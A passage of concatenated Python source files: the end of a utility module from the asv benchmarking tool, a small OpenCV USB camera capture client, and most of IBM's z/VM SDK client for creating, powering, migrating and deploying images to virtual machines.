api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. Update " "asv to use this file.".format(path)) del d['version'] else: raise UserError( "No version specified in {0}.".format(path)) return d def update_json(cls, path, api_version, compact=False): """ Perform JSON file format updates. Parameters ---------- cls : object Object containing methods update_to_X which updates the given JSON tree from version X-1 to X. path : str Path to JSON file api_version : int The current API version """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) d = load_json(path) if 'version' not in d: raise UserError( "No version specified in {0}.".format(path)) if d['version'] < api_version: for x in range(d['version'] + 1, api_version + 1): d = getattr(cls, 'update_to_{0}'.format(x), lambda x: x)(d) write_json(path, d, api_version, compact=compact) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. " "Upgrade asv in order to use or add to " "these results.".format(path)) def iter_chunks(s, n): """ Iterator that returns elements from s in chunks of size n. """ chunk = [] for x in s: chunk.append(x) if len(chunk) == n: yield chunk chunk = [] if len(chunk): yield chunk def pick_n(items, n): """Pick n items, attempting to get equal index spacing. """ if not (n > 0): raise ValueError("Invalid number of items to pick") spacing = max(float(len(items)) / n, 1) spaced = [] i = 0 while int(i) < len(items) and len(spaced) < n: spaced.append(items[int(i)]) i += spacing return spaced def get_multiprocessing(parallel): """ If parallel indicates that we want to do multiprocessing, imports the multiprocessing module and sets the parallel value accordingly. """ if parallel != 1: import multiprocessing if parallel <= 0: parallel = multiprocessing.cpu_count() return parallel, multiprocessing return parallel, None def iter_subclasses(cls): """ Returns all subclasses of a class. """ for x in cls.__subclasses__(): yield x for y in iter_subclasses(x): yield y def hash_equal(a, b): """ Returns `True` if a and b represent the same commit hash. """ min_len = min(len(a), len(b)) return a.lower()[:min_len] == b.lower()[:min_len] def get_cpu_info(): """ Gets a human-friendly description of this machine's CPU. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/cpuinfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'model name': return val.decode('ascii') elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return check_output([sysctl, '-n', 'machdep.cpu.brand_string']).strip() elif sys.platform.startswith('win'): try: from win32com.client import GetObject cimv = GetObject(r"winmgmts:root\cimv2") return cimv.ExecQuery("Select Name from Win32_Processor")[0].name except Exception: pass return '' def get_memsize(): """ Returns the amount of physical memory in this machine. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/meminfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'MemTotal': return int(val.split()[0]) elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return int(check_output([sysctl, '-n', 'hw.memsize']).strip()) return '' def format_text_table(rows, num_headers=0, top_header_span_start=0, top_header_text=None): """ Format rows in as a reStructuredText table, in the vein of:: ========== ========== ========== -- top header text, span start 1 ---------- --------------------- row0col0 r0c1 r0c2 ========== ========== ========== row1col0 r1c1 r1c2 row2col0 r2c1 r2c2 ========== ========== ========== """ # Format content text_rows = [["{0}".format(item).replace("\n", " ") for item in row] for row in rows] # Ensure same number of items on all rows num_items = max(len(row) for row in text_rows) for row in text_rows: row.extend([''] * (num_items - len(row))) # Determine widths col_widths = [max(len(row[j]) for row in text_rows) + 2 for j in range(num_items)] # Pad content text_rows = [[item.center(w) for w, item in zip(col_widths, row)] for row in text_rows] # Generate result headers = [" ".join(row) for row in text_rows[:num_headers]] content = [" ".join(row) for row in text_rows[num_headers:]] separator = " ".join("-" * w for w in col_widths) result = [] if top_header_text is not None: left_span = "-".join("-" * w for w in col_widths[:top_header_span_start]) right_span = "-".join("-" * w for w in col_widths[top_header_span_start:]) if left_span and right_span: result += ["--" + " " * (len(left_span) - 1) + top_header_text.center(len(right_span))] result += [" ".join([left_span, right_span])] else: result += [top_header_text.center(len(separator))] result += ["-".join([left_span, right_span])] result += headers result += [separator.replace("-", "=")] elif headers: result += headers result += [separator] result += content result = [separator.replace("-", "=")] + result result += [separator.replace("-", "=")] return "\n".join(result) def _datetime_to_timestamp(dt, divisor): delta = dt - datetime.datetime(1970, 1, 1) microseconds = (delta.days * 86400 + delta.seconds) * 10**6 + delta.microseconds value, remainder = divmod(microseconds, divisor) if remainder >= divisor // 2: value += 1 return value def datetime_to_timestamp(dt): """ Convert a Python datetime object to a UNIX timestamp. """ return _datetime_to_timestamp(dt, 10**6) def datetime_to_js_timestamp(dt): """ Convert a Python datetime object to a JavaScript timestamp. """ return _datetime_to_timestamp(dt, 10**3) def js_timestamp_to_datetime(ts): """ Convert a JavaScript timestamp to a Python datetime object. """ return datetime.datetime.fromtimestamp(ts / 1000) def is_nan(x): """ Returns `True` if x is a NaN value. """ if isinstance(x, float): return x != x return False def is_na(value): """ Return True if value is None or NaN """ return value is None or is_nan(value) def mean_na(values): """ Take a mean, with the understanding that None and NaN stand for missing data. """ values = [x for x in values if not is_na(x)] if values: return sum(values) / len(values) else: return None def geom_mean_na(values): """ Compute geometric mean, with the understanding that None and NaN stand for missing data. """ values = [x for x in values if not is_na(x)] if values: exponent = 1 / len(values) prod = 1.0 acc = 0 for x in values: prod *= abs(x)**exponent acc += x return prod if acc >= 0 else -prod else: return None def ceildiv(numerator, denominator): """Ceiling division""" return -((-numerator) // denominator) if not WIN: long_path_open = open long_path_rmtree = shutil.rmtree def long_path(path): return path else: def long_path(path): if path.startswith("\\\\"): return path return "\\\\?\\" + os.path.abspath(path) def _remove_readonly(func, path, exc_info): """Try harder to remove files on Windows""" if isinstance(exc_info[1], OSError) and exc_info[1].errno == errno.EACCES: # Clear read-only flag and try again try: os.chmod(path, stat.S_IWRITE | stat.S_IREAD) func(path) return except OSError: pass # Reraise original error raise def long_path_open(filename, *a, **kw): return open(long_path(filename), *a, **kw) def long_path_rmtree(path, ignore_errors=False): if ignore_errors: onerror = None else: onerror = _remove_readonly shutil.rmtree(long_path(path), ignore_errors=ignore_errors, onerror=onerror) def sanitize_filename(filename): """ Replace characters to make a string safe to use in file names. This is not a 1-to-1 mapping. The implementation needs to match www/asv.js:escape_graph_parameter """ if not isinstance(filename, str): filename = filename.decode(sys.getfilesystemencoding()) # ntfs & ext3 filename = re.sub('[<>:"/\\^|?*\x00-\x1f]', '_', filename) # ntfs forbidden = ["CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9"] if filename.upper() in forbidden: filename = filename + "_" return filename def namedtuple_with_doc(name, slots, doc): cls = collections.namedtuple(name, slots) cls.__doc__ = doc return cls def recvall(sock, size): """ Receive data of given size from a socket connection """ data = b"" while len(data) < size: s = sock.recv(size - len(data)) data += s if not s: raise RuntimeError("did not receive data from socket " "(size {}, got only {!r})".format(size, data)) return data def interpolate_command(command, variables): """ Parse a command with interpolated variables to a sequence of commands. The command is parsed as in posix-style shell (by shlex) and split to parts. Additional constructs recognized: - ``ENVVAR=value <command>``: parsed as declaring an environment variable named 'ENVVAR'. - ``return-code=value <command>``: parsed as declaring valid return codes. - ``in-dir=value <command>``: parsed as declaring working directory for command. Parameters ---------- command : str Command to execute, posix shell style. variables : dict Interpolation variables. Returns ------- command : list of str Command arguments. env : dict Environment variables declared in the command. return_codes : {set, int, None} Valid return codes. cwd : {str, None} Current working directory for the command, if any. """ parts = shlex.split(command) try: result = [c.format(**variables) for c in parts] except KeyError as exc: raise UserError("Configuration error: {{{0}}} not available " "when substituting into command {1!r} " "Available: {2!r}" "".format(exc.args[0], command, variables)) env = {} return_codes_set = False return_codes = {0} cwd = None while result: m = re.match('^([A-Za-z_][A-Za-z0-9_]*)=(.*)$', result[0]) if m: env[m.group(1)] = m.group(2) del result[0] continue if result[0].startswith('return-code='): if return_codes_set: raise UserError("Configuration error: multiple return-code specifications " "in command {0!r} " "".format(command)) break if result[0] == 'return-code=any': return_codes = None return_codes_set = True del result[0] continue m = re.match('^return-code=([0-9,]+)$', result[0]) if m: try: return_codes = set(int(x) for x in m.group(1).split(",")) return_codes_set = True del result[0] continue except ValueError: pass raise UserError("Configuration error: invalid return-code specification " "{0!r} when substituting into command {1!r} " "".format(result[0], command)) if result[0].startswith('in-dir='): if cwd is not None: raise UserError("Configuration error: multiple in-dir specifications " "in command {0!r} " "".format(command)) break cwd = result[0][7:] del result[0] continue break return result, env, return_codes, cwd def truncate_float_list(item, digits=5): """ Truncate floating-point numbers (in a possibly nested list) to given significant digits, for a shorter base-10 representation. """ if isinstance(item, float): fmt = '{{:.{}e}}'.format(digits - 1) return float(fmt.format(item)) elif isinstance(item, list): return [truncate_float_list(x, digits) for x in item] else: return item _global_locks = {} def _init_global_locks(lock_dict): """Initialize global locks in a new multiprocessing process""" _global_locks.update(lock_dict) def new_multiprocessing_lock(name): """Create a new global multiprocessing lock""" _global_locks[name] = multiprocessing.Lock() def get_multiprocessing_lock(name): """Get an existing global multiprocessing lock""" return _global_locks[name] def get_multiprocessing_pool(parallel=None): """Create a multiprocessing.Pool, managing global locks properly""" return multiprocessing.Pool(initializer=_init_global_locks, initargs=(_global_locks,)) try: from shlex import quote as shlex_quote except ImportError: _find_unsafe = re.compile(r'[^\w@%+=:,./-]').search def shlex_quote(s): """Return a shell-escaped version of the string *s*.""" if not s: return "''" if _find_unsafe(s) is None: return s # use single quotes, and put single quotes into double quotes # the string $'b is then quoted as '$'"'"'b' return "'" + s.replace("'", "'\"'\"'") + "'"
usb_camera_client.py
# coding: utf-8 import Queue import time import threading import cv2 QUEUE_SIZE = 10 TIME_INTERVAL_TAKE_PHOTO = 0.03 # camera is 30 FPS class CameraClient(): def __init__(self, camNo = 0): cap = cv2.VideoCapture(camNo) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1920) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080) self.cap = cap self.photoQueue = Queue.Queue(maxsize=QUEUE_SIZE) self.th = threading.Thread(target=self._takePhotoWorker) self.th.setDaemon(True) self.th.start() def _takePhotoWorker(self): while True: ret, frame = self.cap.read() if ret: if self.photoQueue.full(): self.photoQueue.get() self.photoQueue.put(frame) time.sleep(TIME_INTERVAL_TAKE_PHOTO) def getPhoto(self): return self.photoQueue.get()
smtclient.py
# Copyright 2017,2020 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import functools import hashlib # On SLES12, we found that if you import urllib.parse later # than requests, you will find a error like 'not able to load # urllib.parse, this is because urllib will be in sys.modules # when first import requests # as workaround here, we first import urllib then import requests # later, we need consider to use urllib.request to replace # requests if that's possible to avoid this kind of issue from io import IOBase import shutil import six.moves.urllib.parse as urlparse import requests import threading import os import re import six import string import tempfile from smtLayer import smt from zvmsdk import config from zvmsdk import constants as const from zvmsdk import database from zvmsdk import exception from zvmsdk import log from zvmsdk import returncode from zvmsdk import utils as zvmutils CONF = config.CONF LOG = log.LOG _LOCK = threading.Lock() CHUNKSIZE = 4096 _SMT_CLIENT = None def get_smtclient(): global _SMT_CLIENT if _SMT_CLIENT is None: try: _SMT_CLIENT = zvmutils.import_object( 'zvmsdk.smtclient.SMTClient') except ImportError: LOG.error("Unable to get smtclient") raise ImportError return _SMT_CLIENT class SMTClient(object): def __init__(self): self._smt = smt.SMT() self._pathutils = zvmutils.PathUtils() self._NetDbOperator = database.NetworkDbOperator() self._GuestDbOperator = database.GuestDbOperator() self._ImageDbOperator = database.ImageDbOperator() def _request(self, requestData): try: results = self._smt.request(requestData) except Exception as err: LOG.error('SMT internal parse encounter error') raise exception.SDKInternalError(msg=err, modID='smt') def _is_smt_internal_error(results): internal_error_list = returncode.SMT_INTERNAL_ERROR for error in internal_error_list: if results['overallRC'] != error[0]: # overallRC does not match, continue next continue if error[1] is not None and results['rc'] != error[1]: # rc match failed continue if error[2] is not None and results['rs'] not in error[2]: # rs match failed continue # All match finish successfully, return true return True return False if results['overallRC'] != 0: results.pop('logEntries') # Check whether this smt error belongs to internal error, if so, # raise internal error, otherwise raise clientrequestfailed error if _is_smt_internal_error(results): msg = "SMT internal error. Results: %s" % str(results) LOG.error(msg) raise exception.SDKInternalError(msg=msg, modID='smt', results=results) else: msg = ("SMT request failed. RequestData: '%s', Results: '%s'" % (requestData, str(results))) raise exception.SDKSMTRequestFailed(results, msg) return results def get_guest_temp_path(self, userid): return self._pathutils.get_guest_temp_path(userid) def get_guest_path(self, userid): return self._pathutils.get_guest_path(userid) def clean_temp_folder(self, tmp_folder): return self._pathutils.clean_temp_folder(tmp_folder) def _generate_vdev(self, base, offset): """Generate virtual device number based on base vdev :param base: base virtual device number, string of 4 bit hex. :param offset: offset to base, integer. """ vdev = hex(int(base, 16) + offset)[2:] return vdev.rjust(4, '0') def _generate_increasing_nic_id(self, nic_id): """Generate increasing nic id string :param nic_id: hexadecimal nic id like '1000' :return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002' """ nic_id = str(hex(int(nic_id, 16)))[2:] nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:] nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:] if len(nic_id_2) > 4: errmsg = ("Virtual device number %s is not valid" % nic_id_2) raise exception.SDKInvalidInputFormat(msg=errmsg) return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2) def generate_disk_vdev(self, start_vdev=None, offset=0): """Generate virtual device number for disks :param offset: offset of user_root_vdev. :return: virtual device number, string of 4 bit hex. """ if not start_vdev: start_vdev = CONF.zvm.user_root_vdev vdev = self._generate_vdev(start_vdev, offset) if offset >= 0 and offset < 254: return vdev else: msg = ("Failed to generate disk vdev, invalid virtual device" "number for disk:%s" % vdev) LOG.error(msg) raise exception.SDKGuestOperationError(rs=2, msg=msg) def add_mdisks(self, userid, disk_list, start_vdev=None): """Add disks for the userid :disks: A list dictionary to describe disk info, for example: disk: [{'size': '1g', 'format': 'ext3', 'disk_pool': 'ECKD:eckdpool1'}] """ for idx, disk in enumerate(disk_list): if 'vdev' in disk: # this means user want to create their own device number vdev = disk['vdev'] else: vdev = self.generate_disk_vdev(start_vdev=start_vdev, offset=idx) self._add_mdisk(userid, disk, vdev) disk['vdev'] = vdev if disk.get('disk_pool') is None: disk['disk_pool'] = CONF.zvm.disk_pool sizeUpper = disk.get('size').strip().upper() sizeUnit = sizeUpper[-1] if sizeUnit != 'G' and sizeUnit != 'M': sizeValue = sizeUpper disk_pool = disk.get('disk_pool') [diskpool_type, diskpool_name] = disk_pool.split(':') if (diskpool_type.upper() == 'ECKD'): # Convert the cylinders to bytes convert = 737280 else: # Convert the blocks to bytes convert = 512 byteSize = float(float(int(sizeValue) * convert / 1024) / 1024) unit = "M" if (byteSize > 1024): byteSize = float(byteSize / 1024) unit = "G" byteSize = "%.1f" % byteSize disk['size'] = byteSize + unit return disk_list def remove_mdisks(self, userid, vdev_list): for vdev in vdev_list: self._remove_mdisk(userid, vdev) def dedicate_device(self, userid, vaddr, raddr, mode): """dedicate device :userid: The name of the image obtaining a dedicated device :vaddr: The virtual device number of the device :raddr: A real device number to be dedicated or attached to the specified image :mode: Specify a 1 if the virtual device is to be in read-only mode. Otherwise, specify a 0. """ # dedicate device to directory entry self._dedicate_device(userid, vaddr, raddr, mode) def _dedicate_device(self, userid, vaddr, raddr, mode): """dedicate device.""" action = 'dedicate' rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' % {'uid': userid, 'act': action, 'va': vaddr, 'ra': raddr, 'mod': mode}) action = "dedicate device to userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_fcp_info_by_status(self, userid, status): """get fcp information by the status. :userid: The name of the image to query fcp info :status: The status of target fcps. eg:'active', 'free' or 'offline'. """ results = self._get_fcp_info_by_status(userid, status) return results def _get_fcp_info_by_status(self, userid, status): action = 'fcpinfo' rd = ' '.join(['getvm', userid, action, status]) action = "query fcp info of '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) return results['response'] def undedicate_device(self, userid, vaddr): """undedicate device :userid: The name of the image obtaining a dedicated device :vaddr: The virtual device number of the device """ # undedicate device to directory entry self._undedicate_device(userid, vaddr) def _undedicate_device(self, userid, vaddr): """undedicate device.""" action = 'undedicate' rd = ('changevm %(uid)s %(act)s %(va)s' % {'uid': userid, 'act': action, 'va': vaddr}) action = "undedicate device from userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_image_performance_info(self, userid): """Get CPU and memory usage information. :userid: the zvm userid to be queried """ pi_dict = self.image_performance_query([userid]) return pi_dict.get(userid, None) def _parse_vswitch_inspect_data(self, rd_list): """ Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get inspect data. """ def _parse_value(data_list, idx, keyword, offset): return idx + offset, data_list[idx].rpartition(keyword)[2].strip() vsw_dict = {} with zvmutils.expect_invalid_resp_data(): # vswitch count idx = 0 idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2) vsw_dict['vswitch_count'] = int(vsw_count) # deal with each vswitch data vsw_dict['vswitches'] = [] for i in range(vsw_dict['vswitch_count']): vsw_data = {} # skip vswitch number idx += 1 # vswitch name idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1) vsw_data['vswitch_name'] = vsw_name # uplink count idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1) # skip uplink data idx += int(up_count) * 9 # skip bridge data idx += 8 # nic count vsw_data['nics'] = [] idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1) nic_count = int(nic_count) for j in range(nic_count): nic_data = {} idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1) userid, toss, vdev = nic_id.partition(' ') nic_data['userid'] = userid nic_data['vdev'] = vdev idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx, 'nic_fr_rx:', 1 ) idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx, 'nic_fr_rx_dsc:', 1 ) idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx, 'nic_fr_rx_err:', 1 ) idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx, 'nic_fr_tx:', 1 ) idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx, 'nic_fr_tx_dsc:', 1 ) idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx, 'nic_fr_tx_err:', 1 ) idx, nic_data['nic_rx'] = _parse_value(rd_list, idx, 'nic_rx:', 1 ) idx, nic_data['nic_tx'] = _parse_value(rd_list, idx, 'nic_tx:', 1 ) vsw_data['nics'].append(nic_data) # vlan count idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1) # skip vlan data idx += int(vlan_count) * 3 # skip the blank line idx += 1 vsw_dict['vswitches'].append(vsw_data) return vsw_dict def _is_vdev_valid(self, vdev, vdev_info): for used_vdev in vdev_info: if (((int(vdev, 16) >= int(used_vdev, 16)) and (int(vdev, 16) <= int(used_vdev, 16) + 2)) or ((int(vdev, 16) < int(used_vdev, 16)) and (int(vdev, 16) >= int(used_vdev, 16) - 2))): return False return True def get_power_state(self, userid): """Get power status of a z/VM instance.""" LOG.debug('Querying power stat of %s' % userid) requestData = "PowerVM " + userid + " status" action = "query power state of '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(requestData) with zvmutils.expect_invalid_resp_data(results): status = results['response'][0].partition(': ')[2] return status def _check_power_state(self, userid, action): # Get the vm status power_state = self.get_power_state(userid) # Power on the vm if it is inactive if power_state == 'off': msg = ('The vm %s is powered off, please start up it ' 'before %s' % (userid, action)) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) def guest_start(self, userid): """Power on VM.""" requestData = "PowerVM " + userid + " on" with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_stop(self, userid, **kwargs): """Power off VM.""" requestData = "PowerVM " + userid + " off" if 'timeout' in kwargs.keys() and kwargs['timeout']: requestData += ' --maxwait ' + str(kwargs['timeout']) if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']: requestData += ' --poll ' + str(kwargs['poll_interval']) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_softstop(self, userid, **kwargs): """Power off VM gracefully, it will call shutdown os then deactivate vm""" requestData = "PowerVM " + userid + " softoff --wait" if 'timeout' in kwargs.keys() and kwargs['timeout']: requestData += ' --maxwait ' + str(kwargs['timeout']) else: requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout) if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']: requestData += ' --poll ' + str(kwargs['poll_interval']) else: requestData += ' --poll ' + str(CONF.guest.softstop_interval) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_pause(self, userid): self._check_power_state(userid, 'pause') requestData = "PowerVM " + userid + " pause" with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_unpause(self, userid): self._check_power_state(userid, 'unpause') requestData = "PowerVM " + userid + " unpause" with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_reboot(self, userid): requestData = ' '.join(("PowerVM", userid, "reboot")) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_reset(self, userid): requestData = ' '.join(("PowerVM", userid, "reset")) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def live_migrate_move(self, userid, destination, parms): """ moves the specified virtual machine, while it continues to run, to the specified system within the SSI cluster. """ rd = ('migratevm %(uid)s move --destination %(dest)s ' % {'uid': userid, 'dest': destination}) if 'maxtotal' in parms: rd += ('--maxtotal ' + str(parms['maxTotal'])) if 'maxquiesce' in parms: rd += ('--maxquiesce ' + str(parms['maxquiesce'])) if 'immediate' in parms: rd += " --immediate" if 'forcearch' in parms: rd += " --forcearch" if 'forcedomain' in parms: rd += " --forcedomain" if 'forcestorage' in parms: rd += " --forcestorage" action = "move userid '%s' to SSI '%s'" % (userid, destination) try: self._request(rd) except exception.SDKSMTRequestFailed as err: msg = '' if action is not None: msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) def live_migrate_test(self, userid, destination): """ tests the specified virtual machine and reports whether or not it is eligible to be relocated to the specified system. """ rd = ('migratevm %(uid)s test --destination %(dest)s ' % {'uid': userid, 'dest': destination}) action = "test to move userid '%s' to SSI '%s'" % (userid, destination) try: self._request(rd) except exception.SDKSMTRequestFailed as err: msg = '' if action is not None: msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) def _get_ipl_param(self, ipl_from): if len(ipl_from) > 0: ipl_param = ipl_from else: ipl_param = CONF.zvm.user_root_vdev return ipl_param def create_vm(self, userid, cpu, memory, disk_list, profile, max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam, dedicate_vdevs, loaddev): """ Create VM and add disks if specified. """ rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s ' '--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i ' '--maxMemSize %(max_mem)s --setReservedMem' % {'uid': userid, 'mem': memory, 'pri': const.ZVM_USER_DEFAULT_PRIVILEGE, 'cpu': cpu, 'prof': profile, 'max_cpu': max_cpu, 'max_mem': max_mem}) if CONF.zvm.default_admin_userid: rd += (' --logonby "%s"' % CONF.zvm.default_admin_userid) # when use dasd as root disk, the disk_list[0] would be the boot # disk. # when boot from volume, ipl_from should be specified explicitly. if (disk_list and 'is_boot_disk' in disk_list[0] and disk_list[0]['is_boot_disk']) or ipl_from: # we assume at least one disk exist, which means, is_boot_disk # is true for exactly one disk. rd += (' --ipl %s' % self._get_ipl_param(ipl_from)) # load param for ipl if ipl_param: rd += ' --iplParam %s' % ipl_param if ipl_loadparam: rd += ' --iplLoadparam %s' % ipl_loadparam if dedicate_vdevs: rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs) if loaddev: if 'portname' in loaddev: rd += ' --loadportname %s' % loaddev['portname'] if 'lun' in loaddev: rd += ' --loadlun %s' % loaddev['lun'] action = "create userid '%s'" % userid try: self._request(rd) except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 436) and (err.results['rs'] == 4)): result = "Profile '%s'" % profile raise exception.SDKObjectNotExistError(obj_desc=result, modID='guest') else: msg = '' if action is not None: msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) # Add the guest to db immediately after user created action = "add guest '%s' to database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._GuestDbOperator.add_guest(userid) # Continue to add disk if disk_list: # Add disks for vm return self.add_mdisks(userid, disk_list) def _add_mdisk(self, userid, disk, vdev): """Create one disk for userid NOTE: No read, write and multi password specified, and access mode default as 'MR'. """ size = disk['size'] fmt = disk.get('format', 'ext4') disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool [diskpool_type, diskpool_name] = disk_pool.split(':') if (diskpool_type.upper() == 'ECKD'): action = 'add3390' else: action = 'add9336' rd = ' '.join(['changevm', userid, action, diskpool_name, vdev, size, '--mode MR']) if fmt and fmt != 'none': rd += (' --filesystem %s' % fmt.lower()) action = "add mdisk to userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_vm_list(self): """Get the list of guests that are created by SDK return userid list""" action = "list all guests in database" with zvmutils.log_and_reraise_sdkbase_error(action): guests_in_db = self._GuestDbOperator.get_guest_list() guests_migrated = \ self._GuestDbOperator.get_migrated_guest_info_list() # db query return value in tuple (uuid, userid, metadata, comments) userids_in_db = [g[1].upper() for g in guests_in_db] userids_migrated = [g[1].upper() for g in guests_migrated] userid_list = list(set(userids_in_db) - set(userids_migrated)) return userid_list def _remove_mdisk(self, userid, vdev): rd = ' '.join(('changevm', userid, 'removedisk', vdev)) action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid) with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def guest_authorize_iucv_client(self, userid, client=None): """Punch a script that used to set the authorized client userid in vm If the guest is in log off status, the change will take effect when the guest start up at first time. If the guest is in active status, power off and power on are needed for the change to take effect. :param str guest: the user id of the vm :param str client: the user id of the client that can communicate to guest using IUCV""" client = client or zvmutils.get_smt_userid() iucv_path = "/tmp/" + userid if not os.path.exists(iucv_path): os.makedirs(iucv_path) iucv_auth_file = iucv_path + "/iucvauth.sh" zvmutils.generate_iucv_authfile(iucv_auth_file, client) try: requestData = "ChangeVM " + userid + " punchfile " + \ iucv_auth_file + " --class x" self._request(requestData) except exception.SDKSMTRequestFailed as err: msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:" " %s" % (userid, err.format_message())) LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) finally: self._pathutils.clean_temp_folder(iucv_path) def guest_deploy(self, userid, image_name, transportfiles=None, remotehost=None, vdev=None): """ Deploy image and punch config driver to target """ # (TODO: add the support of multiple disks deploy) msg = ('Start to deploy image %(img)s to guest %(vm)s' % {'img': image_name, 'vm': userid}) LOG.info(msg) image_file = '/'.join([self._get_image_path_by_name(image_name), CONF.zvm.user_root_vdev]) # Unpack image file to root disk vdev = vdev or CONF.zvm.user_root_vdev cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev, image_file] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ("unpackdiskimage failed with return code: %d." % rc) err_output = "" output_lines = output.split('\n') for line in output_lines: if line.__contains__("ERROR:"): err_output += ("\\n" + line.strip()) LOG.error(err_msg + err_output) raise exception.SDKGuestOperationError(rs=3, userid=userid, unpack_rc=rc, err=err_output) # Purge guest reader to clean dirty data rd = ("changevm %s purgerdr" % userid) action = "purge reader of '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) # Punch transport files if specified if transportfiles: # Copy transport file to local msg = ('Start to send customized file to vm %s' % userid) LOG.info(msg) try: tmp_trans_dir = tempfile.mkdtemp() local_trans = '/'.join([tmp_trans_dir, os.path.basename(transportfiles)]) if remotehost: cmd = ["/usr/bin/scp", "-B", "-P", CONF.zvm.remotehost_sshd_port, "-o StrictHostKeyChecking=no", ("%s:%s" % (remotehost, transportfiles)), local_trans] else: cmd = ["/usr/bin/cp", transportfiles, local_trans] with zvmutils.expect_and_reraise_internal_error(modID='guest'): (rc, output) = zvmutils.execute(cmd) if rc != 0: err_msg = ('copy config drive with command %(cmd)s ' 'failed with output: %(res)s' % {'cmd': str(cmd), 'res': output}) LOG.error(err_msg) raise exception.SDKGuestOperationError(rs=4, userid=userid, err_info=err_msg) # Punch config drive to guest userid rd = ("changevm %(uid)s punchfile %(file)s --class X" % {'uid': userid, 'file': local_trans}) action = "punch config drive to userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) finally: # remove the local temp config drive folder self._pathutils.clean_temp_folder(tmp_trans_dir) # Authorize iucv client self.guest_authorize_iucv_client(userid) # Update os version in guest metadata # TODO: may should append to old metadata, not replace image_info = self._ImageDbOperator.image_query_record(image_name) metadata = 'os_version=%s' % image_info[0]['imageosdistro'] self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata) msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s' ' successfully' % {'img': image_name, 'vm': userid, 'vdev': vdev}) LOG.info(msg) def 